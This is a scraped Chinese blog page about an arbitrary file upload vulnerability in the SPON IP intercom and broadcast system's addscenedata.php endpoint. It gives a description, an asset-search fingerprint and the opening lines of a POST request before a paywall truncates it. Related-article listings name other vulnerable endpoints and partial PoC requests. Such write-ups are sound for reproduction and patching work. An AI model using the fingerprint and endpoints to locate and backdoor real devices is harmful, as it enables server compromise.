世邦通信 SPON IP网络对讲广播系统addscenedata.php任意文件上传漏洞

最新推荐文章于 2025-04-29 21:00:00 发布
最新推荐文章于 2025-04-29 21:00:00 发布
阅读量1.3k 收藏 9
点赞数 20
分类专栏: 漏洞复现 文章标签: 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135504935
版权
本文介绍了世邦通信的SPONIP网络对讲广播系统存在的任意文件上传漏洞,攻击者可通过构造请求包上传恶意文件获取权限。文章提供了漏洞复现方法和针对此漏洞的修复建议,包括升级至安全版本、限制公网访问及设置白名单访问。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash=“-1830859634”

在这里插入图片描述

漏洞复现

POST /php/addscenedata.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5
最低0.47元/天 解锁文章
漏洞复现】SPON世邦-IP网络对讲广播系统-addscenedata-任意文件上传
知黑而守白
01-27 261
SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。SPON世邦IP网络对讲广播系统 addscenedata 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
漏洞复现】SPON世邦-IP网络对讲广播系统-my_parser-文件上传
知黑而守白
01-27 189
SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。SPON世邦IP网络对讲广播系统 my_parser 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
漏洞复现】Hikvision SPON IP网络对讲广播系统任意文件上传
失心少年
01-08 1118
它支持全双工语音通信、单呼/多呼、组呼/广播等多种通信模式,可以实现跨地域、跨网络的实时通讯。该系统具有灵活的群组管理、智能化的调度和优先级控制功能,可以满足各种场景下的紧急通讯和协作需求。同时,系统支持多种接入设备和应用程序,具有良好的可扩展性和互操作性。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
spon IP网络对讲广播系统任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-04 283
spon IP网络对讲广播系统任意文件上传漏洞(含批量验证poc)
spon IP网络对讲广播系统任意文件上传漏洞(含批量验证poc)(1)
2401_83973995的博客
04-14 594
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
IP设备代码审计
HBohan的博客
11-23 1442
偶尔看到一个设备的漏洞挖掘。尝试也看了一下代码。如下: 参考:https://blog.csdn.net/HBohan/article/details/121492754 漏洞一、任意文件上传 <?php $error = false; $tmpFilePath = $_FILES['upload']['tmp_name']; $tmpFilePath = mb_convert_encoding($tmpFilePath, "GBK", "UTF-8"); if ($tmpFilePath !=
世邦通信 SPON IP网络对讲广播系统exportrecord.php 任意文件读取漏洞
Keepb1ue的博客
01-10 2011
世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
世邦通信 SPON IP网络对讲广播系统uploadjson.php任意文件上传漏洞
Keepb1ue的博客
01-10 2360
世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
世邦通信SPON IP网络对讲广播系统任意文件上传漏洞
2301_77604523的博客
08-23 655
影响:上传恶意脚本简述:世邦通信SPON IP网络对讲广播系统的/php/addmediadata.php接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意脚本文件,从而控制整个服务器。0x04 影响版本SPON IP网络对讲广播系统0x05 POCPOST /php/addmediadata.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows;0x03 漏洞详情漏洞类型:任意文件上传
世邦通信 SPON IP网络对讲广播系统getzoneterminaldata.php 未授权访问
Keepb1ue的博客
01-12 897
世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
机器人“跨协议对话”秘籍:EtherNet IP转PROFINET网关应用实录
bjbxkj的博客
04-29 246
由于两种协议在通信标准和数据格式上存在差异,导致机器人手臂无法与现场的终端控制器直接通信,设备之间的数据交换无法顺利进行,严重影响了生产线的整体效率。通过该网关的及时引入,我们避免了大规模设备改造带来的高昂成本和生产延误风险,显著提高了设备协作效率和生产线整体性能,获得了生产部门的一致认可。针对这一问题,我们工程师团队经过详细分析和现场测试,决定采用EtherNet/IP转PROFINET通信协议网关(倍讯BX-606-EIP)来实现快速、稳定的协议转换。接受控制器主动发送的指令及数据请求。
网络原理初识
2401_83526138的博客
04-29 274
物理层规定了网络通信中一些硬件设施(网线,光纤,WIFI)的要求。
吴恩达强化学习复盘(11)连续状态空间|深度Q网络
wgc2k的博客
04-28 881
这是是一个能让用户在月球上着陆模拟飞行器的应用,它类似于一个被很多强化学习研究者使用的电子游戏。在这个应用中,用户的任务是在月球着陆器快速接近月球表面时,在适当的时间点燃推进器,使其安全降落在着陆台上。
局域网视频会议软件BeeWorks Meet
weixin_53855915的博客
04-29 220
视频会议是企业协作的重要工具,它可以支持日常会议、异地协作等内部沟通需求,节省时间和成本,在与合作伙伴沟通方面,视频会议能助力远程沟通、项目展示及商务谈判,提高合作效率。相比传统的公有云视频会议服务,私有化部署的视频会议系统在安全性、可控性、定制化和成本效益等方面具有显著优势,为企业内部使用提供了强大的支持。BeeWorks音视频会议系统支持多种类型的会议,如网络会议、在线培训、远程招聘等。提供全面的参会管理功能,如添加/删除参会人、控制发言、点名、举手、投票、签到等,方便会议组织者进行高效管理。
网络钓鱼工具包Darcula引入AI技术 网络犯罪门槛进一步降低
FreeBuf_的博客
04-27 820
AI升级Darcula钓鱼工具,网络犯罪门槛骤降,企业防御告急!
【计算机网络】DHCP——动态配置ip地址
2303_78135757的博客
04-29 413
DHCP 的作用:自动分配 IP 地址及其他网络配置,简化网络管理。 • 工作原理:通过 Discover → Offer → Request → ACK 四步完成 IP 分配。 • 关键特性:IP 地址池、租期管理、续约机制、静态/动态分配。 • 适用场景:企业、家庭、公共场所 Wi-Fi、物联网等动态网络环境。 • 注意事项:需防范 DHCP 欺骗攻击,合理设置租期和排除地址
FPGA 39 ,FPGA 网络通信协议栈进阶,RGMII、ARP 与 UDP 协议与模块设计( RGMII、ARP、UDP原理与模块设计 )
最新发布
weixin_65793170的博客
04-29 1063
⭐在《FPGA 38 ,FPGA 网络通信协议栈基础,ARP 协议深度解析与模块划分( ARP与以太网帧,以及ARP模块常用文件 )》中,我们围绕 ARP 与 以太网帧展开了深入探讨,从 ARP 协议在 OSI 与 TCP/IP 模型中的定位,到以太网帧内 ARP 数据包的结构解析,再到 FPGA 中 ARP 模块的核心设计与功能实现,为 FPGA 网络通信协议栈搭建起重要的底层基石。而网络通信的完整实现,离不开多种协议的协同运作以及对底层时序和接口的精确控制。这里将基于上篇文章的知识积累,进一步深入剖
关于TCP三次握手和四次挥手的疑点
Foreverthinker的博客
04-26 466
备注:为什么是四次挥手不是三次挥手,因为TCP连接是全双工,任何一端都是具有发送和接受功能的,如果是三次,也就是在第二次服务端回复ACK信息时,加上Fin终结发送指令,有可能服务端此时还没有数据还没有传输处理完成,需要等待传输完成后,再发送Fin终结指令,所以将三次拆成四次;并且这个时间段,防止旧连接的报文干扰新连接的收发,防止在新连接的时候误识别为需要关闭,等待旧连接的报文在网络中消失;:2MSL的等待时间确保了连接的旧数据包在网络中消失,避免新连接中出现旧连接的数据包混淆。
ip-prefix前缀列表
m0_73931111的博客
04-26 488
通过指定 ip-prefix 列表的名称,filter-policy 能够根据 ip-prefix 中定义的条件来决定是否允许或拒绝某些路由信息的通过。filter-policy 为 ip-prefix 提供应用上下文:ip-prefix 本身只是一个定义了匹配规则的列表,而 filter-policy 则将这些规则应用到具体的路由协议和方向中,使得 ip-prefix 的过滤功能得以在实际的路由过程中发挥作用。:ACL只能抓取路由的前缀,没用办法匹配路由的掩码信息,如果有两条路由前缀相同,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值